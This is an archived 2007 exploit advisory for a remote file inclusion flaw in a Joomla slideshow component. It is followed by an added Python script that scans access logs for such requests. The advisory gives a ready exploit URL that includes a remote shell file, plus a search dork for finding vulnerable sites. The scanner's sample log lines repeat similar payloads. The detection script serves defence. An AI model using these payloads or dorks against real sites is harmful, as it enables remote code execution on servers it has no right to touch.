by: ShockShadow - Electronic Security Team (www.Yee7.com)
CVSS: 7.5 HIGH
CWE: Remote File Inclusion
Patch Exists: NO
2007

Joomla Component Flash Slide Show (admin.slideshow1.php) – RFI

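A remote file inclusion vulnerability in the Joomla component Flash Slide Show Image Gallery: admin.slideshow1.php builds the path passed to include() from the mosConfig_live_site variable, which the exploit sets through a request parameter, letting an attacker make the script include a remote file. The vulnerability is considered high risk.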

Exploit-DB raw data:

--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+         Joomla Component Flash Slide Show (admin.slideshow1.php) - RFI         +==--
--==+================================================================================+==--

Script Name:  Joomla Component Flash Slide Show Image Gallery
exploit:      Remote File Inclusion [High Risk]
Author:       ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://www.joomlahacks.com/component/option,com_remository/Itemid,41/func,download/id,491/chk,cb182dd5ecd024f36f7a8fa98dd8935e/
             http://www.box.net/shared/6xeh4doczd
Search Key:   inurl:/com_slideshow/

##############################

Line 3 of admin.slideshow1.php
>    include( "$mosConfig_live_site/components/com_slideshow1/about.html" );
==============

eXploit: http://domain.com/Joomla_Path/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://shell.txt

###############################
by: ShockShadow
GrEEtZ t0:
Mr.HaCkEr, Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, HamzaBX1, Alakrb Almoftres, Falcon Hammdan, RoMaNcYxHaCkEr
Medo Hacker, rUn-vIrUs, Dr.eXe, zAx
AND ALL FRIENDS

# milw0rm.com [2007-09-21]
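
A log check for requests of the form shown in the advisory, as an added example that is not part of the original advisory or of the component. It goes beyond `mosConfig_live_site` and flags any `mosConfig_*` parameter set from the query string, on the assumption that these Joomla 1.0 configuration variables are never legitimately supplied by a client. The combined access log format and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Values that would point include() at a remote resource or a stream wrapper.
REMOTE_RE = re.compile(r'\s*(?:(?:https?|ftps?|php)://|data:)', re.I)

def classify(line):
    """Return (severity, param, value) for a suspicious request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    finding = None
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # PHP rewrites '.' and ' ' in parameter names to '_' before use,
        # so normalise the name the same way before comparing.
        name = name.replace(".", "_").replace(" ", "_")
        if not name.startswith("mosConfig_"):
            continue
        if REMOTE_RE.match(value):
            return ("high", name, value)      # config variable set to a URL
        finding = finding or ("medium", name, value)  # config variable overridden
    return finding

def scan(lines):
    """Return (line_number, severity, param, value) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = classify(line)
        if result:
            hits.append((number, *result))
    return hits

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Sep/2007:10:00:00 +0000] "GET /index.php?option=com_slideshow&Itemid=41 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Sep/2007:10:01:00 +0000] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://remote.example/s.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [21/Sep/2007:10:02:00 +0000] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=%68ttp%3A%2F%2Fremote.example%2Fs.txt%3F HTTP/1.1" 200 312',
    '203.0.113.5 - - [21/Sep/2007:10:03:00 +0000] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_absolute_path=/tmp/ HTTP/1.1" 200 0',
    '203.0.113.5 - - [21/Sep/2007:10:04:00 +0000] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig.live.site=ftp://remote.example/s HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so a value delivered in a POST body or a cookie is not visible to this check.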